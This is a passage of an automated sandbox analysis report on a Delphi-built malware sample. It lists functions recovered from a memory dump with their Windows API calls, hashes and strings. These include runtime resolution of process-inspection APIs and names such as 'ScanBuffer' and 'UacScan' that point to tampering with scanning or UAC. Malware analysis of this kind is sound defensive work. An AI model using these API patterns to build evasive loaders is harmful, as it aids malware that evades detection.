Instruction ID: f9b0732b09595038fbfe94858c023ac4753bbdd806d38196c3e4c10679278690
Opcode Fuzzy Hash: 7dcca02ad665ea3a27abe082d6f35980b550b7f8b629479e3a70de55dbb5397a
Instruction Fuzzy Hash: DBE0E5352407087BE311EB62EE91D4E77ADEB8AB20B5104B1E500D3580DD716D008860

Function 02A05868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02A00000,?,00000105), ref: 02A05886

Part of subcall function 02A05ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A00000,02A2E790), ref: 02A05AE8
Part of subcall function 02A05ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A00000,02A2E790), ref: 02A05B06
Part of subcall function 02A05ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A00000,02A2E790), ref: 02A05B24
Part of subcall function 02A05ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A05B42
Part of subcall function 02A05ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A05BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A05B8B
Part of subcall function 02A05ACC: RegQueryValueExA.ADVAPI32(?,02A05D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A05BD1,?,80000001), ref: 02A05BA9
Part of subcall function 02A05ACC: RegCloseKey.ADVAPI32(?,02A05BD8,00000000,?,?,00000000,02A05BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A05BCB

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: ab771593308f76cde7167db4067424d97c003c09c863b916267438b268610dd5
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: ADE03971A002148BDB14DE98D9C0A863798AB08750F440961AC58CF286DBB0D9148BD4

Function 02A07DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02A07DF4

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction ID: 16c1215ec7bf26989713aecec3a98f47a9d5151b36c1d1314049f77e661e4170
Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction Fuzzy Hash: 3DD05BB23091507AE224965A6DC4EB75BDCCBC6770F10063DF658C71C0D7209C01C6B1

Function 02A07E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02A2356F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,Initialize), ref: 02A07E8B

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction ID: 689aa3e55300baa8d82d5d4a03db8df8f7f6a3a474eda69cfbbca0c96b945e3a
Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction Fuzzy Hash: AFC08CF27132000B5E60A6FC3DC421942891988338B601E21E438CA2C2EF26B8322C20

Function 02A07E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02A2041F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,UacInitialize), ref: 02A07E67

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction ID: 5ad6de27a65e4270c3ee618b3eb0417ede327eabcf6cdda37e0d8b0b642cd880
Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction Fuzzy Hash: 6AC08CA02032000A9A5466FC3DC4249528A19083383640A21A438C62E2EF32B8B26C10

Function 02A04C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02A04C8B

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction ID: 39a837616249aca10bc6f9f7df0dac6b3157909163a34b6899b1d77f4a127f91
Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction Fuzzy Hash: 51C012A264023057EB215799BDC475262DCAB0D394B1400A1A504D7290EB609C0046A0

Function 02A2C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02A2C350,00000000,00000001), ref: 02A2C36C

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: a2f36b6970035f10dfa8706d1ec30a1559cc0cb398cea3c974bd628d5f646370
Instruction ID: 2cab0f8d4a34c3aaeb3d7e284ba95d73bb9038495e78c39472c03aa03740f261
Opcode Fuzzy Hash: a2f36b6970035f10dfa8706d1ec30a1559cc0cb398cea3c974bd628d5f646370
Instruction Fuzzy Hash: 92C092F17D03103AFA1096A96DC2F37569ED309BA0F100A52B704EE2C1EAF368144EA8

Function 02A04C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02A04C3F

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction ID: 385adb42dc4536becd83471a18d7b898e6e84f003783c0cf2484ad3e9dec095d
Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction Fuzzy Hash: D9B0123424830116FB1823623FC0773004C2B8C38BF840061AF18C80D0FF04C4018835

Function 02A04C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02A04C57

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction ID: 8c5d0282075698cddacde4ba7e1f0dfd6e043a7188ccd89f698418ec80f6badd
Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction Fuzzy Hash: 20A022AC8003030A8F0B332C22E002F22333FEC3003C8C0F823000A0C08F3A8000AC30

Function 02A015CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02A01A03), ref: 02A015E2

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 695bcf13819216aed620f3fac15ccf0a6c7caf614272b7402a2a7e558350ae28
Instruction ID: 9a8ef46ccd261e72386267a22223449ccdf04c84f62fab9da701032669fe19fb
Opcode Fuzzy Hash: 695bcf13819216aed620f3fac15ccf0a6c7caf614272b7402a2a7e558350ae28
Instruction Fuzzy Hash: C2F049F0B813018FEB09DFB9AE803457AE2E78E344F108579E609DB3C8EB7184028B00

Function 02A01682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02A016A4

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8e733aff740ca8cab6cdeaf0ec7bc29c6f9e873f426abcb5fe0aa4befe8173fa
Instruction ID: 434b9ea1cd97c65ef9a7f663cd283b732888687fbf039a2a97aef86d78cd3cdc
Opcode Fuzzy Hash: 8e733aff740ca8cab6cdeaf0ec7bc29c6f9e873f426abcb5fe0aa4befe8173fa
Instruction Fuzzy Hash: B1F0B4B2B40795AFE7109F5AACC0782BB98FB04715F050139F90C9B380DB70E8118BD4

Function 02A016E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02A01FE4), ref: 02A01704

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 9009866b5486c49bdde14ec2b5c088cd9472b211c4519463acecbc27ac4ae711
Instruction ID: d2298846e121700d359be4d0942277291ca4bd30f210945831731295bd1201d2
Opcode Fuzzy Hash: 9009866b5486c49bdde14ec2b5c088cd9472b211c4519463acecbc27ac4ae711
Instruction Fuzzy Hash: 55E08675340301AFE7105B7D6DC0792ABDCEB48754F144475F609DB2C1EA60E8108B60

Non-executed Functions

Function 02A1AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02A1ADA3,?,?,02A1AE35,00000000,02A1AF11), ref: 02A1AB30
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02A1AB48
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02A1AB5A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02A1AB6C
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02A1AB7E
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02A1AB90
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02A1ABA2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02A1ABB4
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02A1ABC6
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02A1ABD8
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02A1ABEA
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02A1ABFC
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02A1AC0E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02A1AC20
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02A1AC32
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02A1AC44
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02A1AC56

Strings

Thread32Next, xrefs: 02A1AC06
Toolhelp32ReadProcessMemory, xrefs: 02A1AB9A
Process32First, xrefs: 02A1ABAC
Module32Next, xrefs: 02A1AC2A
Heap32Next, xrefs: 02A1AB88
Process32FirstW, xrefs: 02A1ABD0
Heap32ListNext, xrefs: 02A1AB64
Module32FirstW, xrefs: 02A1AC3C
Process32NextW, xrefs: 02A1ABE2
Module32NextW, xrefs: 02A1AC4E
kernel32.dll, xrefs: 02A1AB2B
Heap32First, xrefs: 02A1AB76
Heap32ListFirst, xrefs: 02A1AB52
Thread32First, xrefs: 02A1ABF4
Process32Next, xrefs: 02A1ABBE
CreateToolhelp32Snapshot, xrefs: 02A1AB40
Module32First, xrefs: 02A1AC18

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: fcdfc3f9597340254df0df00f0f15e7c384e0a24e5f4b33a24e697d6cbe8c6e8
Instruction ID: 914438d7f074fd2c88e49603c338e0cd95628db1ed2b573d04ce4aa56ea925ef
Opcode Fuzzy Hash: fcdfc3f9597340254df0df00f0f15e7c384e0a24e5f4b33a24e697d6cbe8c6e8
Instruction Fuzzy Hash: 7B31CDF4A81750AFEF09EBE4EDC5A2977EDBB15715B100961A401CF245EE78E822CF21

Function 02A05908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02A0593C
lstrcpynA.KERNEL32(?,?,?), ref: 02A0596C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A059D0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000), ref: 02A05A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14), ref: 02A05A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02A05A99

Strings

GetLongPathNameA, xrefs: 02A05933
\, xrefs: 02A05A49
kernel32.dll, xrefs: 02A05920

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: b09f6c85f3accfa64d35358ac7bd7d266cdfa5ec985fac246f17b90e1819ea33
Instruction ID: c0930a488cf53ea1e09f46b1c86adfcc7c55c70afd4b1654121161ff66cfe2a7
Opcode Fuzzy Hash: b09f6c85f3accfa64d35358ac7bd7d266cdfa5ec985fac246f17b90e1819ea33
Instruction Fuzzy Hash: 79416D71D40619ABDB10DBE8DDC8ADEB7BDBF08340F4445A5A548E7281EB709E448F50

Function 02A05BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A05BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A05BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A05BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A05C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A05C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A05C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A05CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A05CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A05CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A05CEB

Strings

Software\Borland\Locales, xrefs: 02A05AFC, 02A05B1A
Software\Borland\Delphi\Locales, xrefs: 02A05B38

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: e26f68553f6b09218ab6d4e36d1ba9954d18dd90e189274ba19c555bd9323dc8
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: E7316471E4026C2AEB25D6B4ACC5BDEB7AD9B08384F4401A1A648E61C1EE749E848F90

Function 02A07FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02A07FF5

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction ID: 668058b41acc154101a14d3a9ca164aaed65a97231e57fd7928a540cd106cfd5
Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction Fuzzy Hash: D411C0B5E00209AF9B04CF99D981DBFF7F9FFC8700B54C569A505E7254E671AA018BA0

Function 02A0A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A0A7E2

Memory Dump Source

